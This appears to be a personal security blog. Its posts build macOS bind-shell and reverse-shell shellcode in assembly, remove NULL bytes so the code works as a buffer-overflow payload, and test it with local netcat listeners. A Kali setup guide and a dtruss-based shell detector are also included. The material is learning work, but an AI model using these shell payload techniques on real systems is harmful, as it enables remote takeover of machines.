Bind Shell

bindshell

This is my second try, and now the goal is to write some code that sets up a listening server on a 64-bit OS X system. I started by writing C code that does the job, to have something to work from; the code can be found here. I will keep this post a bit short, as much of what needs to be done is described in my previous post, Reverse Shell. Following the C code I came up with this assembler version. (I had some problems with the code, but @norsec0de and @TheColonial helped me fix it; big thanks to them for the help.)

bindshell, Usage:

bindshell starts a listening server that you can connect to with the command nc -nv 127.0.0.1 4444 from another directory, for example your home directory.

  nasm -g -f macho64 bindshell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o bindshell bindshell.o
  ./bindshell

Go to the terminal and run nc -nv 127.0.0.1 4444, then type ls; you should now see a directory listing of the directory you started bindshell in.

The next step was to convert it into something that could be used as a payload, i.e. remove the "bad values" (see the reverse shell post). I ended up with bindshell_no_bad_values.s, which is not optimized with respect to length. Then I converted this to shellcode values and tried the C code bindshell_test.c. There were some problems: I could not get the code to listen for incoming connections. To solve that I used the excellent command dtruss ./bindshell_test, and by looking at its output I found that my socket call got the wrong values; I fixed this by adding the setuid call. An example of what dtruss produces can be seen below:

  ...
  getaudit_addr(0x7FFF554B7C90, 0x30, 0x0)   = 0 0
  csops(0x16821, 0x7, 0x7FFF554B7870)        = -1 Err#22
  setuid(0x0, 0x0, 0x7FFF554B89F0)           = 0 0
  socket(0x2, 0x1, 0x0)                      = 3 0
  bind(0x3, 0x7FFF554B89AC, 0x10)            = 0 0
  listen(0x3, 0x0, 0x0)                      = 0 0
  close(0x3)                                 = 0 0
  ...

Once that was done, the C code worked as expected. For simplicity I also include a Makefile to compile the various examples. To continue my road into shellcode I bought The Shellcoder's Handbook: Discovering and Exploiting Security Holes. I do not know whether the next post will be about wifi hacking or assembler; time will tell.
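As an added example (not code from the original post), here is a small Python parser for dtruss output in the format shown above that flags the syscall sequence a bind or reverse shell leaves in a trace: a socket that is listened on or connected out, then dup2'd over fds 0/1/2 before execve. The sample trace is constructed: its csops/socket/bind/listen lines mirror the trace above, while the accept/dup2/execve lines are assumed additions showing what a completed shell would look like.

```python
import re

# Constructed sample in the dtruss format above. The first four lines mirror
# the post's trace; accept/dup2/execve are assumed, not from the post.
SAMPLE_TRACE = """\
csops(0x16821, 0x7, 0x7FFF554B7870)        = -1 Err#22
socket(0x2, 0x1, 0x0)                      = 3 0
bind(0x3, 0x7FFF554B89AC, 0x10)            = 0 0
listen(0x3, 0x0, 0x0)                      = 0 0
accept(0x3, 0x0, 0x0)                      = 4 0
dup2(0x4, 0x0)                             = 0 0
dup2(0x4, 0x1)                             = 1 0
dup2(0x4, 0x2)                             = 2 0
execve(0x7FFF554B89A0, 0x7FFF554B8A00, 0x0) = 0 0
"""

# name(arg, arg, ...) = return errno   (errno is "0" or e.g. "Err#22")
LINE_RE = re.compile(r"^(\w+)\((.*?)\)\s*=\s*(-?\d+)\s+(\S+)$")

def parse_trace(text):
    """Return a list of (syscall, [int args], return value, errno text)."""
    calls = []
    for m in filter(None, map(LINE_RE.match, map(str.strip, text.splitlines()))):
        name, argstr, ret, err = m.groups()
        args = [int(a, 16) for a in argstr.split(",") if a.strip()]
        calls.append((name, args, int(ret), err))
    return calls

def find_shell_patterns(calls):
    """Flag listen/connect on a socket fd and execve after that fd covers stdio."""
    findings, sockets, conn_fds, stdio = [], set(), set(), set()
    for name, args, ret, err in calls:
        if err != "0":
            continue  # a failed call (e.g. Err#22) changes no state
        if name == "socket":
            sockets.add(ret)
        elif name == "listen" and args and args[0] in sockets:
            findings.append("listening socket on fd %d" % args[0])
        elif name == "accept" and args and args[0] in sockets:
            conn_fds.add(ret)  # the accepted connection fd
        elif name == "connect" and args and args[0] in sockets:
            conn_fds.add(args[0])
            findings.append("outbound connection on fd %d" % args[0])
        elif name == "dup2" and len(args) == 2 and args[0] in conn_fds:
            stdio.add(args[1])  # a socket now backs this low fd
        elif name == "execve" and {0, 1, 2} <= stdio:
            findings.append("execve with stdin/stdout/stderr on a socket")
    return findings
```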

Customize Kali Linux

A quick guide to setting up Kali Linux with some extras.

I just got myself an ultrabook and wanted a Linux distribution to experiment with security setups and some development. The installation is a normal Kali Linux with a customized tmux and a Ruby on Rails development environment.

Items that need to be installed are:

  • sublime (text editor)
  • Redis (fast key, value database)
  • nodejs (javascript runtime)

tmux

Change the default prefix key from b to a for easier key bindings; the tmux.conf can be found here: tmux.conf

git

So we can have version control, follow the instructions on GitHub's SSH key setup page.

Sublime

Download Sublime Text 2 here or here (I chose Sublime 2), then extract the package with: tar xf Sublime\ Text\ 2.0.1\ x64.tar.bz2

You'll get a "Sublime Text 2" folder after extraction. This folder contains all the files that Sublime Text needs. I then moved it to the "/opt/" folder: mv Sublime\ Text\ 2 /opt/

To be able to use it from a terminal as "sublime", just create a symbolic link in "/usr/bin": ln -s /opt/Sublime\ Text\ 2/sublime_text /usr/bin/sublime

Redis

Just download the 64-bit version here with wget http://download.redis.io/redis-stable.tar.gz (there is also an online guide here). To unpack, use tar xvzf redis-stable.tar.gz, change into the directory and compile with make. Do not forget to run make test afterwards. To install, run make install; this just copies the binary files so that you can start Redis when needed. To install it as a service, check the README file.

NodeJS

This is a JavaScript runtime that is needed to run various Rails applications. I added the Debian repository to /etc/apt/sources.list by adding this line: deb http://ftp.de.debian.org/debian sid main, then ran apt-get update followed by apt-get install nodejs.

Reverse Shell

reverse_shell

My first attempt was to write a reverse shell for a 64-bit Mac OS X system. One of the first obstacles was to find the header file with the ids for the syscalls; after some googling I found an excellent page with them here. The first step was to write some C code that did the same job and from that deduce the correct order of the syscalls. This resulted in the file reverse_shell.s; keep in mind that in 64-bit the calls need to be in the form 0x2000061 for the syscall 61. The complete code is in reverse_shell.s. The page has a good description of the registers and their naming, and it also includes a tutorial on assembly programming. The first order of business is to replace the nasm that Apple supplies: go to the nasm download page and download the Mac OS X version.

reverse_shell, Usage:

A program that calls out to a service listening on port 4444; the IP is set to any for simplicity. It is written for 64-bit Mac OS X.

Start a listening server with the command nc -l 4444 in another directory, for example your home directory.

  nasm -g -f macho64 reverse_shell.s
  ld  -arch x86_64 -macosx_version_min 10.7.0 -lSystem -o reverse_shell reverse_shell.o
  ./reverse_shell

To use the code as a string payload, one needs to remove the NULL bytes. These can be found by running otool -lV reverse_shell and identifying the mov instructions that need to be modified. The reason is the numerous NULL bytes (\x00): most buffer overflow errors are related to C stdlib string functions such as strcpy(), sprintf(), strcat(), and so on, and all of these functions use the NULL byte to indicate the end of a string. Therefore such a function will not read shellcode past the first NULL byte it encounters. There are other delimiters to watch for as well, like linefeed (0x0A), carriage return (0x0D), 0xFF, and others.

Binary to string

To convert the binary to string values that can be used as a payload, use:

  gobjdump -d ./$1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g' > dump.txt

By inspecting this file, we see quite a few NULL (0x00) bytes, and these have to be removed. A simple paste -d'\0' -s dump.txt will combine all rows into one line that can then be copied into the C file. Another way to find bad values is:

  gobjdump -D reverse_shell -M intel |grep 00

Using the above to find the problematic instructions, we see that most of them involve the mov instruction and that the data we move fits in the lowest byte of the 64-bit register. We can therefore use mov dil, 2 instead of mov rdi, 2. With the same idea we can construct the syscall number for setuid, mov rax, 0x2000017, using the following instructions:

  mov r8b, 0x02               ; unix class system calls = 2 (only the low byte is written; assumes the rest of r8 is already zero)
  shl r8, 24                  ; shift left 24 into the upper order bits -> 0x2000000
  or r8, 0x17                 ; setuid is 0x17
  mov rax, r8                 ; put the setuid syscall # (0x2000017) into rax

The last part is to get rid of the NULL-terminated string db '/bin/sh', 0. This we do by padding the path to eight bytes with an extra slash and using a simple Ruby command (remember that OS X is little endian):

  "/bin//sh".unpack('H*')
  => ["2f62696e2f2f7368"]

Reversing the byte order gives us the value to use: 0x68732f2f6e69622f

The result of these manipulations can be found in reverse_shell_no_bad_values.s. A simpler command to use is the OS X otool: otool -t reverse_shell_no_bad_values.o generates the hex values we need to test our reverse shell code in a simple C program, reverse_shell_test.c. Start your netcat server with nc -l 4444, then run the C code; it should call out to you, and you can check that it works by running some normal shell commands. To simplify compilation you can use the supplied Makefile.

First Post

This is the first post using Octopress. I started the blog to document my path into shellcode programming and other security-related topics. I will try to describe my progress and the difficulties I encounter along the way, and maybe include some standard programs, like how to develop a module for nginx (I found that there is not an abundance of information about that). Another interest is developing in Ruby on Rails, so I will try to include something about that too.